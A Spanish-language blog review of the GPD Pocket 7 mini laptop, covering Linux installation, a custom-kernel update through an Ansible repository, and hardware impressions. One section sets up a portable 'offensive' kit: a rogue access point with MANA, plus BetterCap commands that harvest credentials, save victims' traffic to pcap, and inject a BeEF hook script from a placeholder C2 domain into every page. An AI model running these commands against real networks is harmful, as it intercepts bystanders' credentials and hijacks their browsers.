Menú

GPD Pocket 7- instalación y configuración ofensiva bajo GNU / Linux

 GPD Pocket 7 –  instalación de GNU / Linux y configuración ofensiva

El GPD Pocket 7 , es un portátil ultra pequeño que usa GNU / Linux con un hardware mejorado. Si tratas de comprarlo con otros dispositivos portátiles las ultraportátiles de Linux desde la serie Sharp Zaurus  es mejor, daremos comentarios sobre el procedimiento de instalación y los consejos de configuración.

 

Especificaciones de hardware de última generación para el pequeño equipo:

  • Pantalla táctil IPS full HD de 7 pulgadas (1920 × 1200)
  • CPU Intel Atom x7-Z8750 (Quad Core) a 1.6 GHz
  • 8GB de RAM
  • 128GB eMMC
  • Batería de 7.000 mAh (duración  12 horas de la batería de 12 horas)
  • WiFi 802.11ac
  • Bluetooth 4.1
  • 1x USB 3.0 Type-C
  • 1x USB 3.0 Type-A
  • micro HDMI
  • Conector para auriculares de 3,5 mm

Video de demostracion

Instalación de GNU / Linux

Este dispositivo lo puedes adquirir con los sistemas operativos previamente instaladados tanto para el uso de Windows como de Linux. Actualmente se venden con Ubuntu 16.04.

Para la prueba completa de instalación para este tipo de hardware, se utilizo el GPD Pocket 7 con la versión de Windows, para luego instalar GNU / Linux desde cero, así poder superar y arreglar los problemas de hardware comunes cuando pasamos de Windows a Linux, tras muchos errores, el procedimiento correcto es:

  1. Descargue su distribución GNU / Linux ISO favorita (para la prueba se uso Ubuntu 17.04).
  2. Clonar el repositorio y ejecutar la bootstrap-iso.sh que es la secuencia de comandos para el archivo ISO.
  3. Escribe el  ~/bootstrap.iso  en una unidad USB usando UNetBootin.
  4. Conecta la USB a la GPD, enciénde y presiona el botónDEL para ingresar al BIOS y arrancar desde allí.

Esto iniciará el procedimiento de instalación de GNU / Linux.

Considerar que los datos grapados en USB Type-C aún no funcionan, pero pronto lo harán.

Actualizando el Kernel personalizado.

Después de la instalación y actualización del sistema operativo,  se puede actualizar las correcciones y el kernel personalizado del repositorio, con solo ejecutar el script

gpd-update como root, esto tomará de 2 a 3 horas ya que el núcleo se compila en el dispositivo.

Si estás usando Ubuntu 17.04  y experimentas problemas usaremos este github del enlace anterior  en el siguiente lugar:

Primero verifica que el apt no esté bloqueado y tenga conectividad a Internet.

sudo rm -rf /usr/src/ansible-gpdpocket
sudo git clone https://github.com/cawilliamson/ansible-gpdpocket.git /usr/src/ansible-gpdpocket
cd /usr/src/ansible-gpdpocket
sudo git reset --hard origin/master

Obligatorio edita los archivos de  roles/boot/tasks/debian.ymlelimina el siguiente bloque del script:

- name: install intel-microcode (iso creation = no)
  apt: name=intel-microcode
  when: chroot == false
  tags:
- boot

El microcódigo Intel ya está instalado, ahora iniciar el proceso de actualización en sí con:

sudo ANSIBLE_NOCOWS=1 ansible-playbook system.yml

Después de que la actualización, reinicia y utilizalo, listo para comenzar.

Poniéndose ofensivo

Con una CPU Intel de cuatro núcleos, GNU / Linux y un puerto USB 3.0 el equipo pude realizar muchas labores importantes.

Podemos mejorar las capacidades del equipo por ejemplo con un Powerbank Anker Astro E7 conectado al USB Type-C y el hardware para el puerto USB 3.0 o concentrador USB 3 , para tener el ancho de banda alimentado por el mismo powerbank, pudiendo conectar cualquier otro dispositivo, incluyendo una antena Alfa, Ubertooth One con un analizador de espectro portátil de 2.4Ghz! o tarjetas SDR, OJO: las aplicaciones SDR usarán el completo ancho de banda del puerto USB, lo que significa que uses otro dispositivo al mismo tiempo.

Este es una PoC, esperando que Amazon entregue un concentrador USB:

 

La configuración ofensiva portátil mas simple es:

  • GPD impulsado por el banco de energía antes mencionado.
  • La tarjeta WiFi principal está conectada a mi teléfono inteligente a través de WiFi AP, en sentido ascendente.
  • Alfa AWUS036NHR 2000mW con una antena de doble banda HUACAM HCM82 8dBi para la creacion de un AP e inyección de paquetes.
  • Sensepost MANA corriendo en simple-natmodo.
  • BetterCap para la recolección de credenciales, captura de pcap e informes.
sudo bettercap --no-spoofing --no-discovery -I YOUR_ALFA_INTERFACE -X

también puedes hacer que el proxy HTTP inyecte tu gancho BEEF a cada página:

sudo bettercap --no-spoofing --no-discovery -I YOUR_ALFA_INTERFACE -X --proxy-module injectjs --js-url http://your-beef-c2-domain/hook.js

Al usar bettercap guarda todo en un archivo pcap, este archivo va ha tener el tráfico de tus objetivos y su tamaño es grande, usa el concentrador USB y  conectado a un disco externo.

Luego escribe mejor los argumentos desde la línea de comandos para la inspección fuera de línea y recolección de credenciales.

sudo bettercap ...igual... --sniffer-output /media/your/usbdrive/capture.pcap

TL; DR: Este dispositivo es costoso, pero increíble .

Teclado

Diseño QWERTY desplazada con las teclas pequeñas, te acostumbrarás a menos que tengas manos muy grandes.

Duración de la batería

La duración de la batería en promedio es de 6 horas, pero con el uso del powerbank los USB´s consumen mucha energía, la batería interna es de 7000mAh,  hay usuarios que  lograron 3 horas de juegos intensos en Windows, uso normal en GNU / Linux debería durar bastante tiempo.

Monitor

Tiene buena definición y la pantalla táctil ayudan mucho para navegar por el menú, usar una pantalla táctil es útil en Linux.

Ratón

Sí, el “ratón” tiene retrasos pero es utilizable, es mejor usar el táctil.

Precio

De 500 a 600 USD.

Velocidad / Usabilidad

A pesar de usar un procesador Atom, la CPU funciona bien, si puedes ejecutar un GTS GSM BTS en un RPi , este hardware es realmente más que bueno .

Conectividad

El WiFi interno es estable y tiene buena cobertura, el Bluetooth también funciona muy bien.

Verifica los siguientes enlaces para estar al día.

  • … aquí veras mods y hacks.
  • … aquí personalizaras el kernel y arreglos.
  • … aquí veras el desarrollo del kernel personalizado.
  • esto para actualizaciones oficiales.